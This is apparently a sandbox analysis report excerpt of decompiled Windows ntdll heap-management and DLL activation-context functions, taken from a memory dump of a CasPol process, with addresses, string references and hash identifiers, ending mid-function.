                                                                        0x013daa43
                                                                        0x013daa46
                                                                        0x013daa4d
                                                                        0x014223ab
                                                                        0x014223b2
                                                                        0x014223b8
                                                                        0x014223be
                                                                        0x014223c3
                                                                        0x014223c5
                                                                        0x014223cb
                                                                        0x014223d1
                                                                        0x014223d5
                                                                        0x014223f6
                                                                        0x014223fb
                                                                        0x014223d7
                                                                        0x014223ec
                                                                        0x014223f1
                                                                        0x01422403
                                                                        0x01422408
                                                                        0x01422410
                                                                        0x01422417
                                                                        0x01422422
                                                                        0x01422422
                                                                        0x01422417
                                                                        0x014223c5
                                                                        0x014223b2
                                                                        0x00000000

                                                                        Strings
                                                                        • HEAP: , xrefs: 014222E6, 014223F6
                                                                        • HEAP[%wZ]: , xrefs: 014222D7, 014223E7
                                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 014222F3
                                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01422403
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                        • API String ID: 0-1657114761
                                                                        • Opcode ID: 323c5a6339921f77e7b3d5f0f903916f9bcef4e7c00fe710c69ff97f779cf9fc
                                                                        • Instruction ID: fe678e065b5f59d5561b381cc0e1689a3cd7ee5df730b25a52928bab159627c2
                                                                        • Opcode Fuzzy Hash: 323c5a6339921f77e7b3d5f0f903916f9bcef4e7c00fe710c69ff97f779cf9fc
                                                                        • Instruction Fuzzy Hash: 1DD10175A0020A8FEB19CF6CD680BBABBF1FF48308F158569D9569B742E334E941CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DA229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 69%
                                                                        			E013DA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E013DDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E013F9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0147A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E013F9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E013BB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E013D7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0147138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E013D7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E013D7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01471582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E013D7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E013D7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01471582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0140D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                        0x013da229
                                                                        0x013da231
                                                                        0x013da23f
                                                                        0x013da242
                                                                        0x013da244
                                                                        0x013da24c
                                                                        0x013da255
                                                                        0x013da25a
                                                                        0x013da25f
                                                                        0x01421c76
                                                                        0x01421c78
                                                                        0x01421c7e
                                                                        0x01421c7f
                                                                        0x01421c81
                                                                        0x01421c82
                                                                        0x01421c84
                                                                        0x01421c89
                                                                        0x01421c8b
                                                                        0x01421c9e
                                                                        0x01421c9e
                                                                        0x01421cab
                                                                        0x01421cb2
                                                                        0x00000000
                                                                        0x01421cb2
                                                                        0x01421c8d
                                                                        0x01421c92
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01421c94
                                                                        0x01421c98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01421c98
                                                                        0x013da265
                                                                        0x013da265
                                                                        0x013da266
                                                                        0x013da26f
                                                                        0x013da270
                                                                        0x013da276
                                                                        0x013da277
                                                                        0x013da279
                                                                        0x013da27e
                                                                        0x013da282
                                                                        0x01421db5
                                                                        0x01421dbb
                                                                        0x01421dc1
                                                                        0x01421dc5
                                                                        0x01421de4
                                                                        0x01421de9
                                                                        0x01421dc7
                                                                        0x01421ddc
                                                                        0x01421de1
                                                                        0x01421def
                                                                        0x01421df3
                                                                        0x01421df7
                                                                        0x01421dfe
                                                                        0x01421e06
                                                                        0x013da302
                                                                        0x013da308
                                                                        0x013da308
                                                                        0x013da288
                                                                        0x013da28d
                                                                        0x013da294
                                                                        0x01421cc1
                                                                        0x013da29a
                                                                        0x013da29a
                                                                        0x013da29a
                                                                        0x013da29f
                                                                        0x01421ccb
                                                                        0x01421cd1
                                                                        0x01421cd8
                                                                        0x01421cea
                                                                        0x01421cea
                                                                        0x01421cd8
                                                                        0x013da2a9
                                                                        0x013da2af
                                                                        0x013da2bc
                                                                        0x01421cfd
                                                                        0x013da2c2
                                                                        0x013da2c2
                                                                        0x013da2c2
                                                                        0x013da2c7
                                                                        0x01421d07
                                                                        0x01421d0d
                                                                        0x01421d14
                                                                        0x01421d1f
                                                                        0x01421d21
                                                                        0x01421d2c
                                                                        0x01421d2c
                                                                        0x01421d2c
                                                                        0x01421d47
                                                                        0x01421d47
                                                                        0x01421d14
                                                                        0x013da2cd
                                                                        0x013da2d2
                                                                        0x013da2d9
                                                                        0x01421d5a
                                                                        0x013da2df
                                                                        0x013da2df
                                                                        0x013da2df
                                                                        0x013da2e4
                                                                        0x01421d69
                                                                        0x01421d6b
                                                                        0x01421d76
                                                                        0x01421d76
                                                                        0x01421d76
                                                                        0x01421d91
                                                                        0x01421d91
                                                                        0x013da2ea
                                                                        0x013da2f0
                                                                        0x013da2f5
                                                                        0x01421da8
                                                                        0x01421dad
                                                                        0x01421dad
                                                                        0x013da2fd
                                                                        0x013da300
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                        • API String ID: 2994545307-2586055223
                                                                        • Opcode ID: f1394535976387fe6c773712499ca1b55792773ed806db28aa85dc36ca63f599
                                                                        • Instruction ID: 9c3f59ef16f5fe7b1386c5fe55b1338f363018a145da4f1e2e781c7dc9f09131
                                                                        • Opcode Fuzzy Hash: f1394535976387fe6c773712499ca1b55792773ed806db28aa85dc36ca63f599
                                                                        • Instruction Fuzzy Hash: E75135322046919FE322EB6DD944F677BE8FF84B58F080469F5518B3A1D734E941CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E8E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 44%
                                                                        			E013E8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x14ad360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x14a8464; // 0x74720110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x14a5780 & 0x00000003) != 0) {
							E01435510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x14a5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E013FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x14a7984; // 0xf52b60
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x14a8464; // 0x74720110
					 *0x14ab1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E013E9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x14a5780 & 0x00000005) != 0) {
						_push(_t49);
						E01435510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                        0x013e8e0f
                                                                        0x013e8e16
                                                                        0x013e8e19
                                                                        0x013e8e1b
                                                                        0x013e8e21
                                                                        0x013e8e7f
                                                                        0x013e8e85
                                                                        0x01429354
                                                                        0x0142936c
                                                                        0x01429371
                                                                        0x0142937b
                                                                        0x01429381
                                                                        0x01429381
                                                                        0x0142937b
                                                                        0x013e8e9d
                                                                        0x013e8e9d
                                                                        0x013e8e29
                                                                        0x013e8e2c
                                                                        0x013e8e38
                                                                        0x013e8e3e
                                                                        0x013e8e43
                                                                        0x013e8eb5
                                                                        0x013e8eb9
                                                                        0x014292aa
                                                                        0x014292af
                                                                        0x014292e8
                                                                        0x014292e8
                                                                        0x014292af
                                                                        0x013e8eb9
                                                                        0x013e8e45
                                                                        0x013e8e53
                                                                        0x013e8e5b
                                                                        0x013e8e5f
                                                                        0x013e8e78
                                                                        0x013e8e78
                                                                        0x013e8e7d
                                                                        0x013e8ec3
                                                                        0x013e8ecd
                                                                        0x013e8ed2
                                                                        0x013e8ed2
                                                                        0x013e8ec5
                                                                        0x013e8ec5
                                                                        0x00000000
                                                                        0x013e8e7d
                                                                        0x013e8e67
                                                                        0x013e8ea4
                                                                        0x0142931a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01429320
                                                                        0x013e8ea4
                                                                        0x013e8e70
                                                                        0x01429325
                                                                        0x01429340
                                                                        0x01429345
                                                                        0x01429345
                                                                        0x013e8e76
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Strings
                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0142932A
                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 01429357
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 0142933B, 01429367
                                                                        • LdrpFindDllActivationContext, xrefs: 01429331, 0142935D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 0-3779518884
                                                                        • Opcode ID: f4a030a45c67b06b60eeb24903901017511a11c9e1b1f919fc4b9b5c04b4b40e
                                                                        • Instruction ID: a5521a44c0b378aae0dad6668ad07bc343945e7c0f42adfccc817e3a63ab77ca
                                                                        • Opcode Fuzzy Hash: f4a030a45c67b06b60eeb24903901017511a11c9e1b1f919fc4b9b5c04b4b40e
                                                                        • Instruction Fuzzy Hash: DB412932E003359EEF35AA5DC84DA76BAE4AB8425CF4645EAD90C575E1E770AD8083C1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014749A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                        • API String ID: 2994545307-336120773
                                                                        • Opcode ID: 4b1c1867d1b2af0da111422d984be863fae0df8496eda04e18b9d702bcc1d7a9
                                                                        • Instruction ID: 05673acee5e5d7937a712ba7ce90270508450b8f51f13cf47d23524f50e694eb
                                                                        • Opcode Fuzzy Hash: 4b1c1867d1b2af0da111422d984be863fae0df8496eda04e18b9d702bcc1d7a9
                                                                        • Instruction Fuzzy Hash: 56312871100151EFDB21EBADC885FF7B7ACEF04628F18405AF505DB361EA74A944CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013D99BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E013D99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0146FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0147A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0140D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E013BB150();
										} else {
											E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E013BB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x14a6378 = 1;
											asm("int3");
											 *0x14a6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E013DA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E013DA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E013DBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0147A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E013DA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E013DA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0140D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E013BB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x14a6378 = 1;
									asm("int3");
									 *0x14a6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0146FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0147A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0140D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E013BB150();
													} else {
														E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E013BB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x14a6378 = 1;
														asm("int3");
														 *0x14a6378 = 0;
													}
												}
											}
											_t394 = _a4;
